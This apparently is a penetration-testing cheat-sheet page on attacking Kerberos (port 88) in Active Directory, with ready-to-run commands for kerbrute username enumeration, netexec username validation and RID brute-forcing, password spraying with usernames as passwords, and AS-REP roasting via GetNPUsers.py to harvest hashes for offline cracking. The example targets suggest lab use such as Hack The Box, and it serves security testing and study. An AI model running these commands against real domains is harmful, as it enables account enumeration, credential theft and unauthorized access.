# Kerberos (88/tcp)

### Kerberos needs sync time between client and server

```
sudo ntpdate $IP
```

###

### Don't know username?

Bruteforce:

```
kerbrute userenum --dc $IP -d <domain> /usr/share/wordlist/SecLists/Usernames/xato-net-10-million-usernames.txt
```

Or you can identify/validate with netexec:

> make sure that you register the domain to /etc/hosts

```
netexec smb $IP -k -u '<username>' -p ''

# error:   
# exist --> "KDC_ERR_PREAUTH_FAILED"
# not exist --> "KDC_ERR_C_PRINCIPAL_UNKNOWN"
```

### RID Bruteforce

dump all account with known username:

```
netexec smb $IP -u 'guest' -p '' --rid-brute | tee output.txt


#sort the output
grep User output.txt| awk '{print $6}' | awk -F\\ '{print $2}' |sort -u |grep -v '\$$' |tr '[:upper:]' '[:lower:]'
```

### Do you have many user list from valid RID Enum?

(all users must lower case)

```
netexec smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success
```

### Do you have username?

Collect:

1. Domain
2. Username
3. set domain to /etc/hosts

**GetNPUsers.py** can be used to retrieve domain users who do not have "**Do not require Kerberos preauthentication**" set and ask for their TGTs without knowing their passwords. It is then possible to attempt to crack the session key sent along the ticket to retrieve the user password.

```
GetNPUsers.py -no-pass <domain>/<username>

GetNPUsers.py -no-pass realcorp.htb/j.nakazawa
```

do you have a lot of usernames?

```
GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt
```

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FL7lLN1ej8YWrO5sF64BU%2Fimage.png?alt=media&#x26;token=68f30cfb-516d-434d-bc10-92ac852233ae" alt=""><figcaption><p>result</p></figcaption></figure>

Then crack the hash -> <https://hacker-mind.gitbook.io/hacker-mind/exploit/cracking#kerberost-hash>